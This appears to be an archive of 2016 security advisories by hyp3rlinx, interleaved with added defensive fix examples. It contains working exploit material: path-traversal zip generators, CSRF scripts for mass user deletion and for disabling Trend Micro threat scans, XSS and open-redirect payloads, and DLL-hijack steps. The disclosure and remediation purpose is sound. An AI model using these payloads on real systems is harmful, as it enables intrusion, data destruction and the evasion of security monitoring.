"logout.php" ... 



if (array_key_exists('link_href', $_REQUEST)) {
$link = (string) $_REQUEST['link_href'];
$link = \SimpleSAML\Utils\HTTP::normalizeURL($link);
} else {
$link = 'index.php';
}

if (array_key_exists('link_text', $_REQUEST)) {
$text = $_REQUEST['link_text'];
} else {
$text = '{logout:default_link_text}';
}

$t = new SimpleSAML_XHTML_Template($config, 'logout.php');
$t->data['link'] = $link;
$t->data['text'] = $text;
$t->show();
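An added example (not SimpleSAMLphp's code) of the kind of check the advisory says resolved the issue: the request-supplied URL is validated against a list of trusted domains before it becomes a link, with the hostname parsed rather than substring-matched. `is_trusted_url`, `safe_link_param` and the domain list are assumptions; only the PHP built-ins are real.

```php
<?php
// Added example, not SimpleSAMLphp code: validate a request-supplied URL
// against trusted domains before it becomes a link. Function names and the
// domain list are assumptions; only the PHP built-ins are real.

/**
 * True when $url may be shown as a link: either a root-relative path on this
 * site, or an absolute http(s) URL whose parsed host is a trusted domain or a
 * subdomain of one. The decision never relies on substring matching.
 */
function is_trusted_url(string $url, array $trusted_domains): bool
{
    // Control characters and whitespace: refuse rather than guess how a
    // browser would normalise them.
    if (preg_match('/[\x00-\x20\x7f]/', $url)) {
        return false;
    }
    // Browsers treat backslashes as slashes ("http:\\evil"); parse_url() does not.
    if (strpos($url, '\\') !== false) {
        return false;
    }
    // A root-relative path ("/simplesaml/...") is fine; a scheme-relative one
    // ("//attacker-server/") is not, since it points at another host.
    if ($url !== '' && $url[0] === '/') {
        return strlen($url) < 2 || $url[1] !== '/';
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false; // no host: javascript:, data:, bare words
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }
    // "https://idp.example.org@attacker-server/" parses with host
    // attacker-server; the userinfo part exists only to mislead, so refuse it.
    if (isset($parts['user']) || isset($parts['pass'])) {
        return false;
    }
    $host = strtolower($parts['host']);
    foreach ($trusted_domains as $domain) {
        $domain = strtolower($domain);
        $suffix = '.' . $domain;
        if ($host === $domain || substr($host, -strlen($suffix)) === $suffix) {
            return true;
        }
    }
    return false;
}

/** Read a link parameter the way no_cookie.php / logout.php do, with the check applied. */
function safe_link_param(array $request, string $key, string $default, array $trusted): string
{
    if (!isset($request[$key])) {
        return $default;
    }
    $url = (string)$request[$key];
    return is_trusted_url($url, $trusted) ? $url : $default;
}

// Constructed configuration (the trusted.url.domains equivalent) and inputs.
$trusted = ['idp.example.org', 'sp.example.org'];
$cases = [
    '/simplesaml/module.php/core/frontpage.php',
    'https://sp.example.org/logout-done',
    'https://login.idp.example.org/',
    '//attacker-server/',
    'https://idp.example.org@attacker-server/',
    'http://attacker-server/Evil.php',
    'javascript:alert(1)',
];
foreach ($cases as $c) {
    printf("%-45s %s\n", $c, is_trusted_url($c, $trusted) ? 'allowed' : 'refused');
}
echo safe_link_param(['link_href' => 'http://attacker-server/Evil.php'], 'link_href', 'index.php', $trusted), "\n";
```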



Exploit code(s):
===


1) 
https://victim-server/simplesaml/module.php/core/no_cookie.php?retryURL=https://attacker-server


2) 
https://victim-server/simplesaml/logout.php?link_href=http://attacker-server/Evil.php_text=PLEASE%20DOWNLOAD%20THIS%20IMPORTANT%20UPDATE



Disclosure Timeline:
===
Vendor Notification:  May 31, 2016
June 9, 2016  : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:

Low




hyp3rlinx


AjaxExplorer v1.10.3.2 Remote CMD Execution / CSRF / Persistent XSS

2016-06-01 Thread hyp3rlinx
[+] Credits: hyp3rlinx 

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AJAXEXPLORER-REMOTE-CMD-EXECUTION.txt

[+] ISR: apparitionsec



Vendor:
==
sourceforge.net
smsid

Download link:
sourceforge.net/projects/ajax-explorer/files/


Product:
===
AjaxExplorer v1.10.3.2

Manage server files through simple windows like interface.


Vulnerability Type:
===
Remote Command Execution
CSRF
Persistent XSS


CVE Reference:
==
N/A



Vulnerability Details:
=

AjaxExplorer has a command terminal feature where you can move, copy, delete
files, etc. It also lets a user save commands in a flat file named "terminal"
under their user profile "/ae.user/owner/myprofile".

e.g.

copy [FILEPATH + FILENAME] [FILEPATH]
create [FILEPATH + FILENAME]

Since AjaxExplorer also suffers from a CSRF vulnerability, we can exploit the
application by first creating an .htaccess file with an "allow from all"
directive to bypass access restrictions, and then creating arbitrary PHP files
for remote command execution purposes. This exploit requires two consecutive
HTTP requests, so we need to target an iframe to stay on the same page until
the exploit is completed.



Exploit code(s):
===

1) The first POST request creates the .htaccess file so we can bypass directory
browsing restrictions.
2) The second POST writes our remote command execution file, which we then
access to execute commands on the victim system.

The "P:/" value below for the "strPath" form field stands for "Profile".




http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php; 
method="post">




document.getElementById('htaccess').submit()


http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php; 
method="post">




document.getElementById('RCE').submit()


Now we can access it and run arbitrary commands.

http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/ae.user/owner/myprofile/terminal.php?cmd=c:\\Windows\\system32\\calc.exe


/


Here is another way to get RCE on this application: first create a PHP file, then edit it.



http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php;>






http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php;>




document.getElementById('CSRF1').submit()
document.getElementById('CSRF2').submit()






Persistent XSS:


We can also write a persistent XSS payload to the user profile "terminal" file.

http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php;>




document.getElementById('XSS').submit()




Disclosure Timeline:
===
Vendor Notification:  NA
June 1, 2016  : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:

8.0 (High)
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N




hyp3rlinx


dns_dhcp Web Interface SQL Injection

2016-05-16 Thread hyp3rlinx
[+] Credits: hyp3rlinx 

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/DNS_DHCP-WEB-INTERFACE-SQL-INJECTION.txt

[+] ISR: apparitionsec



Vendor:

tmcdos / sourceforge


Product:
==
dns_dhcp Web Interface

Download: sourceforge.net/projects/dnsmasq-mikrotik-admin/?source=directory

This is a very simple web interface for management of static DHCP leases in 
DNSmasq and Mikrotik.
It generates config files for DNSmasq and uses RouterOS API to manage Mikrotik. 
Network devices (usually PCs)
are separated into subnets by department and use triplets (hostname, MAC 
address, IP address) for identification.
Information is stored in MySQL.



Vulnerability Type:
===
SQL Injection



CVE Reference:
==
N/A



Vulnerability Details:
=

The 'net' HTTP form POST parameter to the dns.php script is not checked/sanitized
and is used directly in a MySQL query, allowing an attacker to easily exfiltrate
any data from the backend database using SQL Injection.

1) On line 239 of dns.php:
$b = str_replace('{FIRMA}',a_select('SUBNET',$_REQUEST['net']),$b);

2) On line 187 of dns.php, in the a_select function, the 2nd argument
$_REQUEST['net'] is passed as $clause and concatenated into the query, which is
executed on line 194 by mysql_query($query).

function a_select($tbl,$clause,$field='',$where='')
{
if ($clause==0) return '';   // loose comparison: a string like "1 OR 1=1" is not 0 and passes
if($field=='') $field=$tbl;
$query = "SELECT $field FROM $tbl WHERE ";
if($where=='') $query.='ID='.$clause;   // $clause ($_REQUEST['net']) concatenated unquoted into the SQL
else $query.=$where;
$res = mysql_query($query) or trigger_error($query.''.mysql_error(),E_USER_ERROR);   // line 194
if(mysql_num_rows($res)>0) return mysql_result($res,0,0);
else return '';
}
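An added example (not dns_dhcp code) of a_select() rewritten so that the ID is bound as a query parameter and the table and column names come from an allowlist. The schema, the `a_select_safe` name and the in-memory SQLite stand-in for MySQL are assumptions for a local demo.

```php
<?php
// Added example, not dns_dhcp code: a_select() rewritten so the ID is bound as
// a parameter and table/column names come from an allowlist. The schema here
// and the SQLite stand-in for MySQL are assumptions for a local demo.

// Tables and the columns a caller may ask for; nothing else is interpolated.
const DNS_TABLES = [
    'SUBNET' => ['ID', 'SUBNET'],
];

/**
 * Same contract as the original a_select($tbl, $clause, $field): the first
 * column of the first matching row, or '' when there is none. The free-text
 * $where argument is dropped entirely; callers that need other predicates get
 * their own prepared statement.
 */
function a_select_safe(PDO $pdo, string $tbl, $clause, string $field = ''): string
{
    if (!isset(DNS_TABLES[$tbl])) {
        throw new InvalidArgumentException("unknown table $tbl");
    }
    if ($field === '') {
        $field = $tbl;
    }
    if (!in_array($field, DNS_TABLES[$tbl], true)) {
        throw new InvalidArgumentException("unknown column $field");
    }
    // The original's "$clause==0" loose check lets "1 OR 1=1" through; require
    // a canonical positive integer and bind it, so no string reaches the SQL.
    if (!is_numeric($clause) || (string)(int)$clause !== (string)$clause || (int)$clause <= 0) {
        return '';
    }
    $stmt = $pdo->prepare(sprintf('SELECT `%s` FROM `%s` WHERE ID = :id', $field, $tbl));
    $stmt->bindValue(':id', (int)$clause, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_NUM);
    return $row === false ? '' : (string)$row[0];
}

// Demo against an in-memory SQLite database standing in for MySQL.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE SUBNET (ID INTEGER PRIMARY KEY, SUBNET TEXT)');
$pdo->exec("INSERT INTO SUBNET VALUES (1, '10.0.1.0/24'), (2, '10.0.2.0/24')");

// The first is a legitimate 'net' value; the rest are the shapes an injection
// attempt takes, and all come back empty without touching the database.
foreach (['2', '2 OR 1=1', '2 UNION SELECT SUBNET FROM SUBNET', '0'] as $net) {
    printf("%-36s => '%s'\n", $net, a_select_safe($pdo, 'SUBNET', $net));
}
```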



Exploit code(s):
===

Run from CL...





Disclosure Timeline:
===
Vendor Notification:  NA
May 14, 2016 : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:

High



Description:
==
Request Method(s):[+] POST


Vulnerable Product:   [+] dns_dhcp Web Interface


Vulnerable Parameter(s):  [+] 'net'
=


hyp3rlinx


eXtplorer v2.1.9 Archive Path Traversal

2016-05-16 Thread hyp3rlinx
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org 

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/EXTPLORER-ARCHIVE-PATH-TRAVERSAL.txt

[+] ISR: apparitionsec


Vendor:
==
extplorer.net



Product:
==
eXtplorer v2.1.9

eXtplorer is a PHP and Javascript-based File Manager, it allows to browse 
directories, edit, copy, move, delete,
search, upload and download files, create & extract archives, create new files 
and directories, change file
permissions (chmod) and more. It is often used as FTP extension for popular 
applications like Joomla.



Vulnerability Type:
==
Archive Path Traversal



CVE Reference:
==
CVE-2016-4313



Vulnerability Details:
=

eXtplorer's unzip/extract feature allows path traversal: if an archive entry name contains "../" sequences, the decompressed file is written outside the intended target directory. This can result in files such as ".htaccess" being overwritten, or in RCE / backdoor placement.


Tested on Windows 


Reproduction steps:
==

1) Generate an archive using the PHP script below.
2) Upload it to eXtplorer and then extract it.
3) Check the directory for the default 'RCE.php' file, or use the command-line switch to overwrite files such as .htaccess.


Exploit code(s):
===

Run below PHP script from CL...


[evil-archive.php]

<?php
// usage guard: script name, archive name, depth and "y" (or a file name plus payload) are expected
if($argc<4){echo "Usage: php evil-archive.php <zipname> <depth> <y|filename> [<payload>]";exit();}
$zipname=$argv[1];
$exploit_file="RCE.php";
$cmd='';   // content written into $exploit_file; empty unless supplied as the fourth argument
if(!empty($argv[2])&&is_numeric($argv[2])){
$depth=$argv[2];
}else{
echo "Second flag (depth) must be numeric!, you supplied '$argv[2]'";
exit();
}
if(strtolower($argv[3])!="y"){
if(!empty($argv[3])){
$exploit_file=$argv[3]; 
}
if(!empty($argv[4])){
$cmd=$argv[4];
}else{
echo "Usage: enter a payload for file $exploit_file wrapped in double quotes";
exit();
}
}
$zip = new ZipArchive();
$res = $zip->open("$zipname.zip", ZipArchive::CREATE);
// each "..\" prefix steps one directory up from the extraction target
$zip->addFromString(str_repeat("..\\", $depth).$exploit_file, $cmd);
$zip->close();
echo "\r\nExploit archive $zipname.zip created using $exploit_file\r\n";
echo " by hyp3rlinx ===";
?>

///

[Script examples] 

Use the default RCE.php by passing the "y" flag, creating DOOM.zip with a path depth of 2 levels:
c:\>php evil-archive.php  DOOM 2  Y


Create DOOM.zip with a path depth of 4 levels and an .htaccess file to overwrite the one on the system:
c:\>php evil-archive.php  DOOM 4  .htaccess  "allow from all"


Disclosure Timeline:
===
Vendor Notification: No reply
May 14, 2016 : Public Disclosure



Exploitation Method:
==
Local



Severity Level:

Medium 6.3
CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information.

hyp3rlinx


CAM UnZip v5.1 Archive Directory Traversal

2016-04-12 Thread hyp3rlinx
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/CAMUNZIP-ARCHIVE-PATH-TRAVERSAL.txt




Vendor:
=
www.camunzip.com



Product:
==
CAM UnZip v5.1



Vulnerability Type:
==
Archive Path Traversal



CVE Reference:
==
N/A



Vulnerability Details:
=

CAM UnZip fails to check that the paths of the files in the archive do not traverse directories when uncompressing the archive.
Specially crafted files in the archive whose names contain '..\' can overwrite files on the filesystem by backtracking, or allow attackers
to place malicious files on the system outside of the target unzip directory, which may lead to remote command execution exploits etc...

Tested successfully Windows 7



Exploit code(s):
===

malicious archive script...


<?php
// usage guard: the archive name (without .zip) is the only argument
if($argc<2){echo "Usage: php script.php <archive-name>";exit();}
$file_name=$argv[1];

$zip = new ZipArchive();
$res = $zip->open("$file_name.zip", ZipArchive::CREATE);
// entry name backtracks eight levels from the extraction directory; the file content is empty here
$zip->addFromString("..\..\..\..\..\..\..\..\RCE.php", '');
$zip->close();

echo "Malicious archive created...\r\n";
echo "= hyp3rlinx ";
?>

/

Result:

Creating Folder: C:\Test\BOZO

Extracting Files From: C:\Test\BOZO.zip

Unzipped file C:\Test\BOZO\..\..\..\..\..\..\..\..\RCE.php of size 28

1 file was Extracted.

C:\RCE.php
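Both archive advisories above (eXtplorer and CAM UnZip) come down to the same missing check: the extractor joins an entry name such as "..\..\RCE.php" onto the target directory without verifying that the result still lies inside it. The Python below is an added example, not code from either product, showing how an extractor can vet entry names and re-check the final path; the archives it uses are constructed in memory and extraction goes to a scratch directory.

```python
import io
import os
import posixpath
import tempfile
import zipfile


def entry_is_safe(name: str) -> bool:
    """Vet one archive entry name before it is joined onto the target directory.
    Backslashes count as separators (Windows extractors treat them that way), so
    the '..\\..\\RCE.php' entry from the CAM UnZip result is rejected just like
    the '../' form eXtplorer is tricked with."""
    norm = name.replace("\\", "/")
    if not norm or norm.startswith("/") or "\x00" in norm:
        return False  # empty, absolute, or NUL-truncation trick
    if len(norm) >= 2 and norm[0].isalpha() and norm[1] == ":":
        return False  # 'C:' drive-letter prefix
    parts = [p for p in posixpath.normpath(norm).split("/") if p not in ("", ".")]
    # after normalisation no '..' segment may survive (a/../b is fine, a/../../b is not)
    return bool(parts) and ".." not in parts


def audit_archive(data: bytes):
    """Return (accepted, rejected) entry names for an in-memory zip."""
    accepted, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            (accepted if entry_is_safe(info.filename) else rejected).append(info.filename)
    return accepted, rejected


def safe_extract(data: bytes, dest: str) -> list:
    """Extract into dest, refusing the whole archive if any entry fails vetting,
    and re-checking each final path with realpath as an independent guard
    (e.g. against a directory that an earlier entry turned into a symlink)."""
    root = os.path.realpath(dest)
    accepted, rejected = audit_archive(data)
    if rejected:
        raise ValueError("traversal entries refused: %r" % rejected)
    written = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in accepted:
            target = os.path.realpath(os.path.join(root, name.replace("\\", "/")))
            if os.path.commonpath([root, target]) != root:
                raise ValueError("entry escapes destination: %r" % name)
            if name.endswith(("/", "\\")):
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(name))
            written.append(os.path.relpath(target, root).replace(os.sep, "/"))
    return written


def build_archive(entries: dict) -> bytes:
    """Constructed in-memory archive: {entry_name: text content}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed archives; the malicious one mirrors the entry names used in both advisories.
MALICIOUS = build_archive({
    "..\\..\\..\\..\\RCE.php": "constructed marker, not a payload",
    "../../evil.txt": "constructed",
    "docs/readme.txt": "hello",
})
CLEAN = build_archive({"docs/readme.txt": "hello", "docs/sub/notes.txt": "notes"})


def demo() -> dict:
    """Audit both archives and run the guarded extraction in a scratch directory."""
    accepted, rejected = audit_archive(MALICIOUS)
    result = {"accepted": accepted, "rejected": rejected}
    with tempfile.TemporaryDirectory() as tmp:
        try:
            safe_extract(MALICIOUS, tmp)
            result["malicious_extracted"] = True
        except ValueError:
            result["malicious_extracted"] = False
        result["clean_written"] = sorted(safe_extract(CLEAN, tmp))
    return result


if __name__ == "__main__":
    print(demo())
```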




Exploitation Technique:
===
Local



Severity Level:

Medium



[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

hyp3rlinx


WPN-XM Serverstack v0.8.6 CSRF - MySQL / PHP.INI Hijacking

2016-04-10 Thread hyp3rlinx
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/WPNXM-CSRF.txt




Vendor:
===
wpn-xm.org



Product:
==
WPN-XM Serverstack for Windows - Version 0.8.6 

WPN-XM is a free and open-source web server solution stack for professional PHP 
development on the Windows platform.


Vulnerability Type:

CSRF - MySQL / PHP.INI Hijacking



CVE Reference:
==
N/A



Vulnerability Details:
=

WPN-XM's web interface is prone to multiple CSRF entry points, allowing remote attackers to compromise an authenticated user who visits
a malicious web page or clicks an attacker-supplied link. Attackers can modify the 'PHP.INI' file to change arbitrary PHP settings,
for example enabling 'allow_url_include', or change the default MySQL username and password settings etc...


Exploit code(s):
===


1) Hijack MySQL Account Default Settings





http://localhost/tools/webinterface/index.php?page=config=update-phpini-setting;>




document.getElementById('CSRF-MySQL-Username').submit()


http://localhost/tools/webinterface/index.php?page=config=update-phpini-setting;>




document.getElementById('CSRF-MySQL-PWD').submit()



2)  Hijack PHP.INI Settings

http://localhost/tools/webinterface/index.php?page=config=update-phpini-setting;>


document.getElementById('CSRF-PHP-INI').submit()





Disclosure Timeline:
=
Vendor Notification: No Reply
April 9, 2016 : Public Disclosure



Exploitation Technique:
===
Remote



Severity Level:

Medium


=

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

hyp3rlinx



WPN-XM Serverstack v0.8.6 XSS

2016-04-10 Thread hyp3rlinx
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/WPNXM-XSS.txt




Vendor:
===
wpn-xm.org



Product:

WPN-XM Serverstack for Windows - Version 0.8.6 

WPN-XM is a free and open-source web server solution stack for professional PHP 
development on the Windows platform.


Vulnerability Type:
=
Cross Site Scripting - XSS 



CVE Reference:
==
N/A



Vulnerability Details:
=

WPN-XM's web interface has cross-site scripting issues allowing remote attackers to execute client-side code in the security
context of the targeted domain, undermining the trust between server and client. XSS attacks can result in data theft, session hijacking etc.


Exploit code(s):
===


XSS 1
http://localhost/tools/webinterface/index.php?page=%22/%3E%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%27%29%3C/script%3E

XSS 2
http://localhost/tools/webinterface/index.php?action=%22/%3E%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%27%29%3C/script%3E

XSS 3
http://localhost/tools/webinterface/index.php?page=config=showtab=%22/%3E%3Cscript%3Ealert%281%29%3C/script%3E



Disclosure Timeline:
=
Vendor Notification: No Reply
April 9, 2016 : Public Disclosure



Exploitation Technique:
===
Remote



Severity Level:

Low


=

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

hyp3rlinx


TrendMicro DDI Cross Site Request Forgerys

2016-03-27 Thread hyp3rlinx
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-DDI-CSRF.txt





Vendor:

www.trendmicro.com



Product:
=
Trend Micro Deep Discovery Inspector
V3.8, 3.7

Deep Discovery Inspector is a network appliance that gives you 360-degree 
network monitoring of all traffic
to detect all aspects of a targeted attack.




Vulnerability Type:

Cross Site Request Forgery - CSRF




CVE Reference:
==
N/A



Vulnerability Details:


Trend Micro Deep Discovery suffers from multiple CSRF vectors; if an authenticated user visits a malicious web page, attackers gain
the ability to modify many settings of the Deep Discovery application to values of their choosing.


Reference:
http://esupport.trendmicro.com/solution/en-US/1113708.aspx

Trend Micro DDI is affected by CSRF vulnerabilities. These affect the following 
console features:

Deny List Notifications
Detection Rules
Threat Detections
Email Settings
Network
Blacklisting/Whitelisting
Time
Accounts
Power Off / Restart
DETAILS
The following DDI versions prior to version 3.8 Service Pack 2 (SP2) are 
affected:

3.8 English 
3.8 Japanese
3.7 English
3.7 Japanese
3.7 Simplified Chinese
Trend Micro has released DDI 3.8 SP2. All versions up to version 3.8 SP1 must 
upgrade to version 3.8 SP2 (Build 3.82.1133) to address this issue.



Exploit code(s):
===



1) Shut down all threat scans and malicious file submissions under:  
Administration /Monitoring / Scanning / Threat Detections



https://localhost/php/scan_options.php; method="post">








document.getElementById('CSRF-ThreatScans').submit()



2) Whitelist C&C server; menu location:  Detections / C&C Callback Addresses 

 https://localhost/php/blacklist_whitelist_query.php; method="post">




document.getElementById('CSRF-Whitelist').submit()
 


3) Turn off or change email notifications

https://localhost/cgi-bin/mailSettings_set.cgi; method="post">


document.getElementById('CSRF-Notifications').submit()


4) Change system settings ( x.x.x.x = whatever IP we want )

https://localhost/cgi-bin/admin_ip.cgi; method="post">


document.getElementById('PWNED').submit()





Disclosure Timeline:
===
Vendor Notification:  November 23, 2015
March 25, 2016 : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:

High



Description:


Request Method(s):[+] POST


Vulnerable Product:   [+] Trend Micro Deep Discovery Inspector V3.8




[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx


Xoops 2.5.7.2 CSRF - Arbitrary User Deletions

2016-03-19 Thread hyp3rlinx
[+] Credits: John Page aka hyp3rlinx 

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/XOOPS-CSRF.txt



Vendor:
=
xoops.org



Product:

Xoops 2.5.7.2



Vulnerability Type:
===
CSRF - Arbitrary User Deletions



Vulnerability Details:
=

Xoops 2.5.7.2 has CSRF vulnerability where remote attackers can delete ALL 
users from the Xoops database.


References:
http://xoops.org/modules/news/article.php?storyid=6757


Exploit Codes:
=

The following CSRF attack deletes users from the database; the POC code below sequentially deletes 100 users from the Xoops application.




   









var c=-1
var amttodelete=100
var id=document.getElementById("ids")
var frm=document.getElementById("CSRF")
function doit(){
c++
arguments[1].value=c
arguments[0].submit()
if(c>=amttodelete){
  clearInterval(si)
  alert("Done!")
}
}
var si=setInterval(doit, 1000, frm, id)





Disclosure Date:
==
Jan 29, 2016: Vendor Notification
Vendor confirms and patches Xoops
March 17, 2016 : Public Disclosure

=

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere. (c) hyp3rlinx.

hyp3rlinx


Xoops 2.5.7.2 Directory Traversal Bypass

2016-03-19 Thread hyp3rlinx
[+] Credits: John Page aka hyp3rlinx 

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/XOOPS-DIRECTORY-TRAVERSAL.txt



Vendor:
=
xoops.org



Product:

Xoops 2.5.7.2



Vulnerability Type:
===
Directory Traversal Bypass



Vulnerability Details:
=

Xoops 2.5.7.2 has checks to defend against directory traversal attacks. However, they can be easily bypassed by simply issuing "..././" instead of "../".


References:
http://xoops.org/modules/news/article.php?storyid=6757


Exploit Codes:
==


In the Xoops code in 'protector.php' the following check is made for dot-dot-slash "../" in HTTP requests:

/

if( is_array( $_GET[ $key ] ) ) continue ;
if ( substr( trim( $val ) , 0 , 3 ) == '../' || strstr( $val , '../../' ) ) {
 $this->last_error_type = 'DirTraversal' ; 
 $this->message .= "Directory Traversal '$val' found.\n" ;



The above Xoops directory traversal check can be defeated by using
..././..././..././..././

You can test the theory with the test case below by supplying ..././ in the GET param 'c'.

<?php
// same condition as the protector.php check above
$val=$_GET['c'];

if ( substr( trim( $val ) , 0 , 3 ) == '../' || strstr( $val , '../../' ) ) {
echo "traversal!";
}else{
echo "ok!" . $val;
}
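The protector.php condition above is a substring blacklist, so "..././" is never flagged. The Python below is an added example, not Xoops code: it ports the check, traces the bypass string through a downstream step that strips "../" a single time (an assumption made here; the page does not show that stage, but non-recursive stripping is what turns "..././" back into "../"), and applies a containment check on the resolved path instead. WEB_ROOT is a constructed root that need not exist on disk.

```python
import os

# Constructed web root for the containment check (does not need to exist).
WEB_ROOT = "/srv/xoops/uploads"


def xoops_style_check(val: str) -> bool:
    """Port of the protector.php condition quoted above.
    True means the request value would be flagged as 'DirTraversal'."""
    v = val.strip()
    return v[:3] == "../" or "../../" in v


def strip_dotdot_once(val: str) -> str:
    """Assumed downstream sanitiser (not shown on the page): removes every '../'
    in one pass, like PHP str_replace('../', '', $val). Because it is not
    applied repeatedly, '..././' collapses to '../' after this step."""
    return val.replace("../", "")


def resolves_inside(root: str, user_path: str) -> bool:
    """Containment check: canonicalise root + user_path and require the result to
    stay under root. It judges the final path, so it does not care how the '..'
    was spelled or how many filter passes ran before it."""
    root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root, user_path.replace("\\", "/")))
    return os.path.commonpath([root, candidate]) == root


def evaluate(val: str, root: str = WEB_ROOT) -> dict:
    """Trace one request value through the blacklist, the assumed strip step and
    the containment check, returning each verdict."""
    stripped = strip_dotdot_once(val)
    return {
        "blacklist_flagged": xoops_style_check(val),
        "after_strip": stripped,
        "contained": resolves_inside(root, stripped),
    }


if __name__ == "__main__":
    for v in ("../../etc/passwd", "..././..././etc/passwd", "docs/readme.txt"):
        print(v, evaluate(v))
```

The blacklist catches the plain form but passes the dotted variant, which the strip step then turns into a genuine "../../"; only the containment check on the resolved path rejects it.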



Disclosure Date:
==
Feb 2, 2016: Vendor Notification
Vendor confirms and patches Xoops
March 17, 2016 : Public Disclosure

==

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere. (c) hyp3rlinx.

hyp3rlinx


Microsoft PowerPointViewer Code Execution

2016-02-29 Thread hyp3rlinx
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-PPT-VIEWER-CODE-EXEC.txt



Vendor:
===
www.microsoft.com



Product:

Microsoft PowerPoint Viewer
version: 12.0.6600.1000



Vulnerability Type:

DLL Hijack Arbitrary Code Execution



Vulnerability Details:
=

Microsoft PowerPoint Viewer 'POWERPNT.EXE' will execute arbitrary code if an 
attacker can place a DLL named "api-ms-win-appmodel-runtime-l1-1-0.dll" in the user's
Downloads directory. This exploit does NOT rely on any embedded OLE objects or 
CLSID-registered COM objects in the document to execute. 


1) create a malicious DLL named "api-ms-win-appmodel-runtime-l1-1-0.dll"

2) place the DLL in the user's Downloads directory, via a drive-by download etc...

3) open an existing .PPT document from the Downloads directory, e.g. 
"C:\Users\Downloads\somefile.ppt"


then BOOM ...


Tested on: Windows 7 SP1 x64



Disclosure Timeline:
=
Vendor Notification:  February 23, 2016
Vendor replied that the DLL side-loading issue is already publicly known.

A Google search returned the following results:

1) examples using embedded OLE objects and MS Word etc
2) old posts
3) examples not referencing "api-ms-win-appmodel-runtime-l1-1-0.dll" DLL

